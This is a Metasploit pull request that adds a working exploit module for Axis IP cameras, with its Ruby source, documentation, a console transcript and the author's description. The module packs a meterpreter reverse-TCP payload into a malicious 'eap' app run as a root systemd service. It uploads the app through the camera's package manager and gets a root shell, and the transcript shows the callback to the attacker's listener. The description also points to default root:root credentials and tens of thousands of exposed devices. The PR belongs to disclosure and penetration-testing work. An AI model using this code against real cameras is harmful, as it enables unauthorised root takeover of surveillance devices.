### PR TITLE
Axis Camera App RCE (No CVE)

### DIFF
--- a/documentation/modules/exploit/linux/http/axis_app_install.md
+++ b/documentation/modules/exploit/linux/http/axis_app_install.md
@@ -1,0 +1,108 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits the "Apps" feature in Axis IP cameras. The feature allows third party
+developers to upload and execute 'eap' applications on the device. The system does not validate
+the application comes from a trusted source, so a malicious attacker can upload and execute
+arbitrary code. The issue has no CVE, although the technique was made public in 2018.
+
+This module uploads and executes stageless meterpreter as `root` via the application upload
+feature. The module will also uninstall the application upon completion. Uploading the application
+requires valid credentials. The default administrator credentials used to be `root:root` but
+newer firmware versions force users to provide a new password for the `root` user.
+
+The module was tested on an Axis M3044-V using the latest firmware (9.80.3.8: December 2021).
+All devices that support the "App" feature are presumed to be vulnerable at this time.
+
+### Installation
+
+Axis cameras are physical devices and aren't known to have been successfully emulated. However,
+if you have a device, affected firmware can be downloaded from:
+
+* https://www.axis.com/
+
+A free account is required to navigate the site but you can download specific firmware without
+authentication. For example, the latest version for the Axis M3044-V can be downloaded here:
+
+* https://www.axis.com/ftp/pub/axis/software/MPQT/M3044-V/9_80_3_8/M3044-V_9_80_3_8.bin
+
+## Verification Steps
+
+* Acquire an affected device
+* Do: `use exploit/linux/http/axis_app_install`
+* Do: `set RHOST <ip>`
+* Do: `set PASSWORD <password>`
+* Do: `check`
+* Verify the remote target is flagged as vulnerable
+* Do: `set LHOST <ip>`
+* Do: `exploit`
+* You should get a Meterpreter session.
+
+## Options
+
+### USERNAME
+
+The username to authenticate to the web server with. The default value is "root".
+
+### PASSWORD
+
+The password to authenticate to the web server with. The default value is "root".
+
+## Scenarios
+
+### Axis M3044-V using firmware 9.80.3.8. Get Meterpreter session.
+
+```
+msf6 > use exploit/linux/http/axis_app_install
+[*] Using configured payload linux/armle/meterpreter_reverse_tcp
+msf6 exploit(linux/http/axis_app_install) > set RHOST 192.168.1.183
+RHOST => 192.168.1.183
+msf6 exploit(linux/http/axis_app_install) > set LHOST 192.168.1.220
+LHOST => 192.168.1.220
+msf6 exploit(linux/http/axis_app_install) > set password labpass1
+password => labpass1
+msf6 exploit(linux/http/axis_app_install) > check
+[*] 192.168.1.183:80 - The target appears to be vulnerable. The target reports itself to be a 'AXIS M3044-V'
+msf6 exploit(linux/http/axis_app_install) > run
+
+[*] Started reverse TCP handler on 192.168.1.220:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The target reports itself to be a 'AXIS M3044-V'
+[*] Creating an application package named: sey
+[*] Sending an application upload request to /axis-cgi/packagemanager.cgi
+[+] Application installed. Pausing 5 seconds to let the filesystem sync.
+[+] Deleted /etc/systemd/system/sey.service
+[*] Meterpreter session 1 opened (192.168.1.220:4444 -> 192.168.1.183:60298 ) at 2022-02-14 17:30:51 -0800
+[*] Sending a delete application request to /axis-cgi/applications/control.cgi
+
+meterpreter > getuid
+Server username: root
+meterpreter > shell
+Process 16666 created.
+Channel 1 created.
+id
+uid=0(root) gid=0(root)
+cat /proc/cpuinfo
+processor	: 0
+model name	: ARMv7 Processor rev 1 (v7l)
+BogoMIPS	: 156.00
+Features	: half thumb fastmult vfp edsp neon vfpv3 tls vfpd32 
+CPU implementer	: 0x41
+CPU architecture: 7
+CPU variant	: 0x4
+CPU part	: 0xc09
+CPU revision	: 1
+
+Hardware	: Ambarella S2L (Flattened Device Tree)
+Revision	: 0000
+Serial		: 0000000000000000
+pwd
+/
+exit
+meterpreter > quit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.1.183 - Meterpreter session 1 closed.  Reason: Died
+msf6 exploit(linux/http/axis_app_install) > 
+```

--- a/documentation/modules/exploit/linux/http/axis_app_install.md
+++ b/documentation/modules/exploit/linux/http/axis_app_install.md
@@ -56,30 +56,68 @@ The password to authenticate to the web server with. The default value is "root"
 ```
 msf6 > use exploit/linux/http/axis_app_install
 [*] Using configured payload linux/armle/meterpreter_reverse_tcp
+msf6 exploit(linux/http/axis_app_install) > options
+
+Module options (exploit/linux/http/axis_app_install):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   root             yes       The password to authenticate with
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      80               yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME   root             yes       The username to authenticate with
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/armle/meterpreter_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Dropper
+
+
 msf6 exploit(linux/http/axis_app_install) > set RHOST 192.168.1.183
 RHOST => 192.168.1.183
-msf6 exploit(linux/http/axis_app_install) > set LHOST 192.168.1.220
-LHOST => 192.168.1.220
-msf6 exploit(linux/http/axis_app_install) > set password labpass1
-password => labpass1
 msf6 exploit(linux/http/axis_app_install) > check
-[*] 192.168.1.183:80 - The target appears to be vulnerable. The target reports itself to be a 'AXIS M3044-V'
+[*] 192.168.1.183:80 - The target is not exploitable. The user provided credentials did not work.
+msf6 exploit(linux/http/axis_app_install) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 exploit(linux/http/axis_app_install) > check
+[*] 192.168.1.183:80 - The target appears to be vulnerable. The target reports itself to be a 'AXIS M3044-V'.
+msf6 exploit(linux/http/axis_app_install) > set LHOST 192.168.1.217
+LHOST => 192.168.1.217
 msf6 exploit(linux/http/axis_app_install) > run
 
-[*] Started reverse TCP handler on 192.168.1.220:4444 
+[*] Started reverse TCP handler on 192.168.1.217:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. The target reports itself to be a 'AXIS M3044-V'
-[*] Creating an application package named: sey
+[+] The target appears to be vulnerable. The target reports itself to be a 'AXIS M3044-V'.
+[*] Creating an application package named: jtn
 [*] Sending an application upload request to /axis-cgi/packagemanager.cgi
 [+] Application installed. Pausing 5 seconds to let the filesystem sync.
-[+] Deleted /etc/systemd/system/sey.service
-[*] Meterpreter session 1 opened (192.168.1.220:4444 -> 192.168.1.183:60298 ) at 2022-02-14 17:30:51 -0800
+[+] Deleted /etc/systemd/system/jtn.service
+[*] Meterpreter session 1 opened (192.168.1.217:4444 -> 192.168.1.183:49602 ) at 2022-02-24 18:45:19 -0800
 [*] Sending a delete application request to /axis-cgi/applications/control.cgi
+[+] The application jtn was successfully removed from the target!
 
 meterpreter > getuid
 Server username: root
 meterpreter > shell
-Process 16666 created.
+Process 13863 created.
 Channel 1 created.
 id
 uid=0(root) gid=0(root)
@@ -99,10 +137,4 @@ Revision	: 0000
 Serial		: 0000000000000000
 pwd
 /
-exit
-meterpreter > quit
-[*] Shutting down Meterpreter...
-
-[*] 192.168.1.183 - Meterpreter session 1 closed.  Reason: Died
-msf6 exploit(linux/http/axis_app_install) > 
 ```

--- a/modules/exploits/linux/http/axis_app_install.rb
+++ b/modules/exploits/linux/http/axis_app_install.rb
@@ -1,0 +1,250 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Axis IP Camera Application Upload',
+        'Description' => %q{
+          This module exploits the "Apps" feature in Axis IP cameras. The feature allows third party
+          developers to upload and execute 'eap' applications on the device. The system does not validate
+          the application comes from a trusted source, so a malicious attacker can upload and execute
+          arbitrary code. The issue has no CVE, although the technique was made public in 2018.
+
+          This module uploads and executes stageless meterpreter as `root`. Uploading the application
+          requires valid credentials. The default administrator credentials used to be `root:root` but
+          newer firmware versions force users to provide a new password for the `root` user.
+
+          The module was tested on an Axis M3044-V using the latest firmware (9.80.3.8: December 2021).
+          Although all modules that support this feature are presumed to be vulnerable.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'jbaines-r7' # Discovery and Metasploit module
+        ],
+        'References' => [
+          [ 'URL', 'https://www.tenable.com/blog/tenable-research-advisory-axis-camera-app-malicious-package-distribution-weakness'],
+          [ 'URL', 'https://www.axis.com/support/developer-support/axis-camera-application-platform']
+        ],
+        'DisclosureDate' => '2018-04-12',
+        'Platform' => ['linux'],
+        'Arch' => [ARCH_ARMLE],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_ARMLE],
+              'Type' => :linux_dropper,
+              'Payload' => {
+              },
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('USERNAME', [true, 'The username to authenticate with', 'root']),
+      OptString.new('PASSWORD', [true, 'The password to authenticate with', 'root'])
+    ])
+  end
+
+  # Check function will attempt to verify:
+  #
+  # 1. The provided credentials work for authentication
+  # 2. The remote target is an axis camera
+  # 3. The applications API exists.
+  #
+  def check
+    # grab the brand/model. Shouldn't require authentication.
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/axis-cgi/prod_brand_info/getbrand.cgi')
+    })
+
+    return CheckCode::Unknown unless res && (res.code == 200)
+
+    body_json = res.get_json_document
+    return CheckCode::Unknown if body_json.empty? || body_json.dig('Brand', 'Brand').nil?
+
+    # The brand / model are now known
+    check_comment = "The target reports itself to be a '#{body_json.dig('Brand', 'Brand')} #{body_json.dig('Brand', 'ProdNbr')}'"
+
+    # check to see if the applications api exists (also tests credentials)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD'],
+      'uri' => normalize_uri(target_uri.path, '/axis-cgi/applications/list.cgi')
+    })
+
+    # A strange edge case where there is no response... respond detected
+    return CheckCode::Detected unless res
+    # Respond safe if credentials fail, to prevent the exploit from running
+    return CheckCode::Safe('The user provided credentials did not work.') if res.code == 401
+    # Assume any non-200 means the API doesn't exist
+    return CheckCode::Safe(check_comment) if res.code != 200
+
+    # This checks for an XML response which I'm not sure is smart considering most of the device
+    # does JSON replies... the concerning being that this response has changed in newer models
+    return CheckCode::Safe(check_comment) unless res.body.include?('<reply result="ok">') != 200
+
+    CheckCode::Appears(check_comment)
+  end
+
+  # Creates a malicious "eap" application. The package application will gain execution
+  # through the postinstall script. The script, which executes as a systemd oneshot, will
+  # create and execute a new service for the payload. We have to d this because the oneshot
+  # child processes will be reaped when the main binary exits. Executing the payload from
+  # a new service gets around that issue.
+  #
+  # The eap registers as a "lua" apptype, because the binary version (armv7hf) gets checked
+  # for some required libraries whereas the lua version is just accepted.
+  #
+  # The construction of the eap follows this pattern:
+  # * tar -cf exploit payload package.conf postinstall.sh payload.service
+  # * gzip exploit
+  # * mv exploit.gz exploit.eap
+  def create_eap(payload, appname)
+    print_status("Creating an application package named: #{appname}")
+    script_name = "#{Rex::Text.rand_text_alpha_lower(2..4)}.sh"
+
+    package_conf = "PACKAGENAME='#{Rex::Text.rand_text_alpha(4..14)}'\n" \
+      "APPTYPE='lua'\n" \
+      "APPNAME='#{appname}'\n" \
+      "APPID='48#{Rex::Text.rand_text_numeric(3)}'\n" \
+      "APPMAJORVERSION='#{Rex::Text.rand_text_numeric(1)}'\n" \
+      "APPMINORVERSION='#{Rex::Text.rand_text_numeric(1)}'\n" \
+      "APPMICROVERSION='#{Rex::Text.rand_text_numeric(1)}'\n" \
+      "APPGRP='root'\n" \
+      "APPUSR='root'\n" \
+      "POSTINSTALLSCRIPT='#{script_name}'\n" \
+      "STARTMODE='respawn'\n"
+
+    # this sync, sleep, cp, sleep pattern is not optimal, but the underlying
+    # filesystem was taking time to catch up to the exploit (and mounting and
+    # unmounting itself which is just weird) and this seemed like a reasonable,
+    # if not hacky, way to give it a chance to catch up. Seems to work well.
+    start_service =
+      "#!/bin/sh\n"\
+      "\nsync\n"\
+      "\nsleep 2\n"\
+      "\ncp ./#{appname}.service /etc/systemd/system/\n" \
+      "\nsleep 2\n"\
+      "\nsystemctl start #{appname}\n"
+
+    # only register the service file for deletion. Everything else will be
+    # deleted by the uninstall function called later.
+    register_file_for_cleanup("/etc/systemd/system/#{appname}.service")
+
+    service =
+      "[Unit]\n"\
+      "Description=\n"\
+      "[Service]\n"\
+      "Type=simple\n"\
+      "User=root\n"\
+      "ExecStart=/usr/local/packages/#{appname}/#{appname}\n"\
+      "\n"\
+      "[Install]\n"\
+      "WantedBy=multi-user.target\n"
+
+    tarfile = StringIO.new
+    Rex::Tar::Writer.new tarfile do |tar|
+      tar.add_file('package.conf', 0o644) do |io|
+        io.write package_conf
+      end
+      tar.add_file(script_name.to_s, 0o755) do |io|
+        io.write start_service
+      end
+      tar.add_file(appname.to_s, 0o755) do |io|
+        io.write payload
+      end
+      tar.add_file("#{appname}.service", 0o644) do |io|
+        io.write service
+      end
+    end
+    tarfile.rewind
+    tarfile.close
+
+    Rex::Text.gzip(tarfile.string)
+  end
+
+  # Upload the malicious EAP application for a root shell. Always attempt to uninstall the application
+  def exploit
+    appname = Rex::Text.rand_text_alpha_lower(3)
+    eap = create_eap(payload.encoded, appname)
+
+    # Instruct the application to install the constructed EAP
+    multipart_form = Rex::MIME::Message.new
+    multipart_form.add_part('{"apiVersion":"1.0","method":"install"}', 'application/json', nil, 'form-data; name="data"; filename="blob"')
+    multipart_form.add_part(eap, 'application/octet-stream', 'binary', 'form-data; name="fileData"; filename="exploit.eap"')
+
+    install_endpoint = normalize_uri(target_uri.path, '/axis-cgi/packagemanager.cgi')
+    print_status("Sending an application upload request to #{install_endpoint}")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD'],
+      'uri' => install_endpoint,
+      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
+      'data' => multipart_form.to_s
+    })
+
+    # check for successful installation
+    fail_with(Failure::Disconnected, 'Connection failed') unless res
+    fail_with(Failure::UnexpectedReply, "HTTP status code is not 200 OK: #{res.code}") unless res.code == 200
+    body_json = res.get_json_document
+    fail_with(Failure::UnexpectedReply, 'Missing JSON response') if body_json.empty?
+    # {"apiVersion"=>"1.4", "method"=>"install", "error"=>{"code"=>60, "message"=>"Failed to install acap"}}
+    fail_with(Failure::UnexpectedReply, 'The target responded with a JSON error') unless body_json['error'].nil?
+
+    # syncing the unstaged meterpreter payload seems to take a little bit for the poor little
+    # embedded filesystem. Give it a chance to sync up before we try to remove the application.
+    print_good('Application installed. Pausing 5 seconds to let the filesystem sync.')
+    sleep(5)
+  ensure
+    uninstall_endpoint = normalize_uri(target_uri.path, '/axis-cgi/applications/control.cgi')
+    print_status("Sending a delete application request to #{uninstall_endpoint}")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD'],
+      'uri' => uninstall_endpoint,
+      'vars_get' => {
+        'action' => 'remove',
+        'package' => appname.to_s
+      }
+    })
+
+    # check for successful removal
+    fail_with(Failure::Disconnected, 'Connection failed') unless res
+    fail_with(Failure::UnexpectedReply, "HTTP status code is not 200 OK: #{res.code}") unless res.code == 200
+    fail_with(Failure::UnexpectedReply, "Missing 'OK' response") unless res.body.include?('OK')
+  end
+end

--- a/modules/exploits/linux/http/axis_app_install.rb
+++ b/modules/exploits/linux/http/axis_app_install.rb
@@ -242,9 +242,13 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     })
 
+    # instructions for manually removal if the above fails. That should never happen, but best be safe.
+    removal_instructions = 'To manually remove the application, log in to the system and then select the apps tab. ' \
+      "Find the app named '#{appname}' and select it. Click the trash bin icon to uninstall it."
+
     # check for successful removal
-    fail_with(Failure::Disconnected, 'Connection failed') unless res
-    fail_with(Failure::UnexpectedReply, "HTTP status code is not 200 OK: #{res.code}") unless res.code == 200
-    fail_with(Failure::UnexpectedReply, "Missing 'OK' response") unless res.body.include?('OK')
+    print_bad("The server did not respond to the application deletion request. #{removal_instructions}") unless res
+    print_bad("The server did not respond with 200 OK to the application deletion request. #{removal_instructions}") unless res.code == 200
+    print_bad("The application deletion response did not contain the expected body. #{removal_instructions}") unless res.body.include?('OK')
   end
 end

--- a/modules/exploits/linux/http/axis_app_install.rb
+++ b/modules/exploits/linux/http/axis_app_install.rb
@@ -91,10 +91,10 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown unless res && (res.code == 200)
 
     body_json = res.get_json_document
-    return CheckCode::Unknown if body_json.empty? || body_json.dig('Brand', 'Brand').nil?
+    return CheckCode::Unknown if body_json.empty? || body_json.dig('Brand', 'ProdShortName').nil?
 
     # The brand / model are now known
-    check_comment = "The target reports itself to be a '#{body_json.dig('Brand', 'Brand')} #{body_json.dig('Brand', 'ProdNbr')}'"
+    check_comment = "The target reports itself to be a '#{body_json.dig('Brand', 'ProdShortName')}'."
 
     # check to see if the applications api exists (also tests credentials)
     res = send_request_cgi({
@@ -121,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Creates a malicious "eap" application. The package application will gain execution
   # through the postinstall script. The script, which executes as a systemd oneshot, will
   # create and execute a new service for the payload. We have to do this because the oneshot
-  # child processes will be reaped when the main binary exits. Executing the payload from
+  # child processes will be terminated when the main binary exits. Executing the payload from
   # a new service gets around that issue.
   #
   # The eap registers as a "lua" apptype, because the binary version (armv7hf) gets checked
@@ -133,15 +133,15 @@ class MetasploitModule < Msf::Exploit::Remote
   # * mv exploit.gz exploit.eap
   def create_eap(payload, appname)
     print_status("Creating an application package named: #{appname}")
-    script_name = "#{Rex::Text.rand_text_alpha_lower(2..4)}.sh"
+    script_name = "#{Rex::Text.rand_text_alpha_lower(3..8)}.sh"
 
     package_conf = "PACKAGENAME='#{Rex::Text.rand_text_alpha(4..14)}'\n" \
       "APPTYPE='lua'\n" \
       "APPNAME='#{appname}'\n" \
       "APPID='48#{Rex::Text.rand_text_numeric(3)}'\n" \
       "APPMAJORVERSION='#{Rex::Text.rand_text_numeric(1)}'\n" \
-      "APPMINORVERSION='#{Rex::Text.rand_text_numeric(1)}'\n" \
-      "APPMICROVERSION='#{Rex::Text.rand_text_numeric(1)}'\n" \
+      "APPMINORVERSION='#{Rex::Text.rand_text_numeric(1..2)}'\n" \
+      "APPMICROVERSION='#{Rex::Text.rand_text_numeric(1..3)}'\n" \
       "APPGRP='root'\n" \
       "APPUSR='root'\n" \
       "POSTINSTALLSCRIPT='#{script_name}'\n" \

--- a/modules/exploits/linux/http/axis_app_install.rb
+++ b/modules/exploits/linux/http/axis_app_install.rb
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
           newer firmware versions force users to provide a new password for the `root` user.
 
           The module was tested on an Axis M3044-V using the latest firmware (9.80.3.8: December 2021).
-          Although all modules that support this feature are presumed to be vulnerable.
+          Although all modules that support the "Apps" feature are presumed to be vulnerable.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2018-04-12',
         'Platform' => ['linux'],
         'Arch' => [ARCH_ARMLE],
-        'Privileged' => false,
+        'Privileged' => true,
         'Targets' => [
           [
             'Linux Dropper',
@@ -120,7 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # Creates a malicious "eap" application. The package application will gain execution
   # through the postinstall script. The script, which executes as a systemd oneshot, will
-  # create and execute a new service for the payload. We have to d this because the oneshot
+  # create and execute a new service for the payload. We have to do this because the oneshot
   # child processes will be reaped when the main binary exits. Executing the payload from
   # a new service gets around that issue.
   #
@@ -250,5 +250,6 @@ class MetasploitModule < Msf::Exploit::Remote
     print_bad("The server did not respond to the application deletion request. #{removal_instructions}") unless res
     print_bad("The server did not respond with 200 OK to the application deletion request. #{removal_instructions}") unless res.code == 200
     print_bad("The application deletion response did not contain the expected body. #{removal_instructions}") unless res.body.include?('OK')
+  print_good("The application #{appname} was successfully removed from the target!")
   end
 end

--- a/modules/exploits/linux/http/axis_app_install.rb
+++ b/modules/exploits/linux/http/axis_app_install.rb
@@ -250,6 +250,6 @@ class MetasploitModule < Msf::Exploit::Remote
     print_bad("The server did not respond to the application deletion request. #{removal_instructions}") unless res
     print_bad("The server did not respond with 200 OK to the application deletion request. #{removal_instructions}") unless res.code == 200
     print_bad("The application deletion response did not contain the expected body. #{removal_instructions}") unless res.body.include?('OK')
-  print_good("The application #{appname} was successfully removed from the target!")
+    print_good("The application #{appname} was successfully removed from the target!")
   end
 end

--- a/modules/exploits/linux/http/axis_app_install.rb
+++ b/modules/exploits/linux/http/axis_app_install.rb
@@ -203,7 +203,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Instruct the application to install the constructed EAP
     multipart_form = Rex::MIME::Message.new
     multipart_form.add_part('{"apiVersion":"1.0","method":"install"}', 'application/json', nil, 'form-data; name="data"; filename="blob"')
-    multipart_form.add_part(eap, 'application/octet-stream', 'binary', 'form-data; name="fileData"; filename="exploit.eap"')
+    multipart_form.add_part(eap, 'application/octet-stream', 'binary', "form-data; name=\"fileData\"; filename=\"#{appname}.eap\"")
 
     install_endpoint = normalize_uri(target_uri.path, '/axis-cgi/packagemanager.cgi')
     print_status("Sending an application upload request to #{install_endpoint}")


### PR DESCRIPTION
## Background

This is an issue I disclosed to Axis back in 2017 and [published](https://www.tenable.com/blog/tenable-research-advisory-axis-camera-app-malicious-package-distribution-weakness) in 2018. No CVE was assigned, and the vendor indicated a plan to address "in the next generation." I revisited this on the latest firmware (Dec. 2021) for a device I have on hand, and the issue persists.

Given that dome cameras are ubiquitous and Axis is a popular vendor (Shodan indexes some 30k likely vulnerable internet facing [doodads](https://www.shodan.io/search?query=html%3A%22Axis+Communications+AB%22)). I figured it would be a fun module to write (it actually was somewhat miserable but :shrug:).

## Description

This module exploits the "Apps" feature in Axis IP cameras. The feature allows third party developers to upload and execute  'eap' applications on the device. The system does not validate the application comes from a trusted source, so a malicious attacker can upload and execute arbitrary code. The issue has no CVE, although the technique was made public in 2018.

This module uploads and executes stageless meterpreter as `root` via the application upload feature. The module will also  uninstall the application upon completion. Uploading the application requires valid credentials. The default administrator credentials used to be `root:root` but newer firmware versions force users to provide a new password for the `root` user.

The module was tested on an Axis M3044-V using the latest firmware (9.80.3.8: December 2021). All devices that support the "App" feature are presumed to be vulnerable at this time.

## Development Quirks

Execution is first established via a bash "post installation" script. The script is executed as a systemd oneshot. That's not great for an exploit as all children will be reaped after the parent exits... executing from post installation also holds the HTTP connection open. All around not good.

My solution was to create a second service that will execute stageless Meterpreter. That seemed to work nicely, but obviously is an extra moving part.

I also elected not to implement a CMD_ARCH payload. The only one that technically works is `reverse_openssl` and it has to be fairly heavily modified. I fiddled around with the idea of adding a new `single` that uses openssl / mkfifo but ultimately decided I'd had enough of the camera, and that having meterpreter on system was better anyway.

The device actually supports both HTTP and HTTPs. Shodan has way more HTTP endpoints though, so I left HTTP as the default setting.

Finally, I want reiterate that the armle starger is unstable. Including on this platform. See #16107.

## Verification

Acquire an affected device:

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/axis_app_install`
- [ ] `set RHOST <ip>`
- [ ]  `set PASSWORD <password>`
- [ ] `check`
- [ ] Verify the remote target is flagged as vulnerable
- [ ]  `set LHOST <ip>`
- [ ]  `exploit`
- [ ]  You should get a Meterpreter session.

## PCAP || GTFO

[axis_camera_meterpreter.zip](https://github.com/rapid7/metasploit-framework/files/8065204/axis_camera_meterpreter.zip)

## Video || GTFO

https://www.youtube.com/watch?v=q7OtSkwpeqY
